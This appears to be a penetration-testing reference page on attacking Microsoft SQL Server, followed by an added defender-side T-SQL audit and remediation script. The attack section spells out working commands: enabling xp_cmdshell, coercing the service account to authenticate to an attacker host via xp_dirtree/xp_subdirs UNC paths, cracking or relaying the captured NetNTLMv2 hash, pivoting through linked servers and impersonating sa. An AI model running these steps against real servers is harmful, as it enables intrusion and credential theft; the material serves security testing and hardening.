MSSQL
aka Microsoft SQL Server, SQL Server
Microsoft SQL Server on 1433. xp_cmdshell gives command execution, UNC tricks capture the service account's NetNTLM hash, and linked servers let you pivot across databases.
Ports
| Port | Proto | Notes |
|---|---|---|
| 1433 | tcp | MSSQL |
Fingerprint
- nmap ms-sql-info / ms-sql-ntlm-info
- Banner reveals the SQL Server version
Key files
| Path | Holds | Sensitive |
|---|---|---|
| web.config / connection strings | sa or app DB credentials | sensitive |
Default / weak creds
sa / weak password; Windows-auth accounts
Service users
the SQL service account (often a domain account)
Exploitation primitives
- xp_cmdshell (enable via sp_configure) runs OS commands as the service account
- xp_dirtree / xp_fileexist pointed at a UNC path makes the service account authenticate to that host; Responder captures the NetNTLMv2, which can then be relayed or cracked
- Linked servers: EXECUTE AT / openquery to run on another instance, sometimes as sa
- EXECUTE AS LOGIN to impersonate higher-privileged logins
Overview
MSSQL on 1433 is a rich target on Windows: it can run OS commands, coerce authentication for hash capture, and chain across linked servers to reach instances you cannot touch directly.
Enumeration and exec
Connect with Windows auth:
impacket-mssqlclient dom/user:pass@<TARGET> -windows-auth
Enable command execution:
enable_xp_cmdshell
Run a command:
xp_cmdshell whoami
Capture the service NetNTLM hash (with Responder running):
exec master..xp_dirtree '\\<YOUR_IP>\share'
Linked servers
List linked servers and their remote login mapping:
enum_links
Run a query on a linked server (often as its sa):
EXEC ('select @@version; exec master..xp_cmdshell ''whoami''') AT [SQL02\INSTANCE]
Enable xp_cmdshell on the remote instance through the link (RPC out):
EXEC ('sp_configure ''show advanced options'', 1; reconfigure; sp_configure ''xp_cmdshell'', 1; reconfigure;') AT [SQL02\INSTANCE]
Impersonation (EXECUTE AS)
Find logins you can impersonate:
SELECT name FROM sys.server_permissions p JOIN sys.server_principals l ON p.grantor_principal_id = l.principal_id WHERE permission_name = 'IMPERSONATE'
Become a higher-privileged login, then act as sysadmin:
EXECUTE AS LOGIN = 'sa'; SELECT SYSTEM_USER; SELECT IS_SRVROLEMEMBER('sysadmin')
Capture / relay the service hash
Coerce auth to your box (run responder -I <iface> or ntlmrelayx first):
EXEC master..xp_subdirs '\\<YOUR_IP>\share\'
Crack the captured NetNTLMv2 (hashcat mode 5600):
hashcat -m 5600 sqlsvc.hash /usr/share/wordlists/rockyou.txt
Or relay it straight to another host instead of cracking:
ntlmrelayx.py -t smb://<OTHER_HOST> -smb2support
Hardening
Keep xp_cmdshell disabled, run the SQL Server service under a low-privilege account, and avoid linked servers whose remote login maps to sa or another sysadmin.
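As an added, defender-side example (not part of the original page), the following T-SQL audits the four primitives listed above and applies the hardening: it reports the xp_cmdshell state, the service account whose hash a UNC coercion would expose, every linked-server login mapping together with its RPC-out setting, and every IMPERSONATE grant at server scope, then shows the corresponding remediation statements and a server audit that records EXECUTE AS and permission changes. All system views, procedures and audit action groups used are standard SQL Server objects; the audit names, the file path, the `linked_reader` login and its password, the `appuser` login and `SQL02\INSTANCE` (the page's own placeholder) are assumptions to be replaced with local values.

```sql
-- Added example: audit and remediation for the MSSQL weaknesses described on this page.
-- Not the page's own code; run as a sysadmin in master. Placeholders are marked.
USE master;

-- 1. xp_cmdshell: value_in_use = 1 means OS command execution is live.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'show advanced options', 'Ole Automation Procedures');

-- Remediation: disable xp_cmdshell and hide the advanced options again.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;           RECONFIGURE;
EXEC sp_configure 'show advanced options', 0; RECONFIGURE;

-- 2. Service account: a domain account here is the one whose NetNTLMv2
--    an xp_dirtree / xp_subdirs UNC coercion would hand to a listener.
SELECT servicename, service_account
FROM sys.dm_server_services;

-- 3. Linked servers: which remote login do callers become, and can they
--    run EXEC (...) AT <link> at all (is_rpc_out_enabled)?
--    local_principal_id = 0 is the catch-all mapping that applies to every login.
SELECT s.name                              AS linked_server,
       s.is_rpc_out_enabled,
       l.remote_name,                      -- 'sa' here is the dangerous mapping
       COALESCE(p.name, '<all logins>')    AS local_login
FROM sys.servers s
JOIN sys.linked_logins l            ON l.server_id = s.server_id
LEFT JOIN sys.server_principals p   ON p.principal_id = l.local_principal_id
WHERE s.is_linked = 1;

-- Remediation: stop RPC-out on the link, drop the catch-all mapping and replace
-- it with a low-privilege remote login. 'SQL02\INSTANCE' is the page's placeholder,
-- 'linked_reader' / '<password>' are placeholders for a restricted remote login.
EXEC sp_serveroption 'SQL02\INSTANCE', 'rpc out', 'false';
EXEC sp_droplinkedsrvlogin 'SQL02\INSTANCE', NULL;          -- NULL = default mapping
EXEC sp_addlinkedsrvlogin 'SQL02\INSTANCE', 'false', NULL, 'linked_reader', '<password>';

-- 4. IMPERSONATE grants at server scope. For class SERVER_PRINCIPAL, major_id is
--    the login being impersonated and grantee_principal_id the login allowed to do it.
SELECT grantee.name                                AS can_impersonate,
       target.name                                 AS impersonated_login,
       IS_SRVROLEMEMBER('sysadmin', target.name)   AS target_is_sysadmin
FROM sys.server_permissions perm
JOIN sys.server_principals grantee ON grantee.principal_id = perm.grantee_principal_id
JOIN sys.server_principals target  ON target.principal_id  = perm.major_id
WHERE perm.permission_name = 'IMPERSONATE'
  AND perm.class_desc = 'SERVER_PRINCIPAL';

-- Remediation for a finding such as appuser -> sa ('appuser' is a placeholder):
REVOKE IMPERSONATE ON LOGIN::[sa] FROM [appuser];

-- 5. Detection: record every EXECUTE AS at server scope and every server-level
--    permission change. Audit names and FILEPATH are placeholders; the directory must exist.
CREATE SERVER AUDIT [Audit_Impersonation]
    TO FILE (FILEPATH = 'D:\SQLAudit\');
CREATE SERVER AUDIT SPECIFICATION [Audit_Impersonation_Spec]
    FOR SERVER AUDIT [Audit_Impersonation]
    ADD (SERVER_PRINCIPAL_IMPERSONATION_GROUP),
    ADD (SERVER_PERMISSION_CHANGE_GROUP)
    WITH (STATE = ON);
ALTER SERVER AUDIT [Audit_Impersonation] WITH (STATE = ON);
```

Run the SELECT statements first on their own to see the findings; the EXEC, REVOKE and CREATE statements are templates to apply per finding, and the audit file can be read back with `sys.fn_get_audit_file` to confirm that EXECUTE AS LOGIN events are being logged.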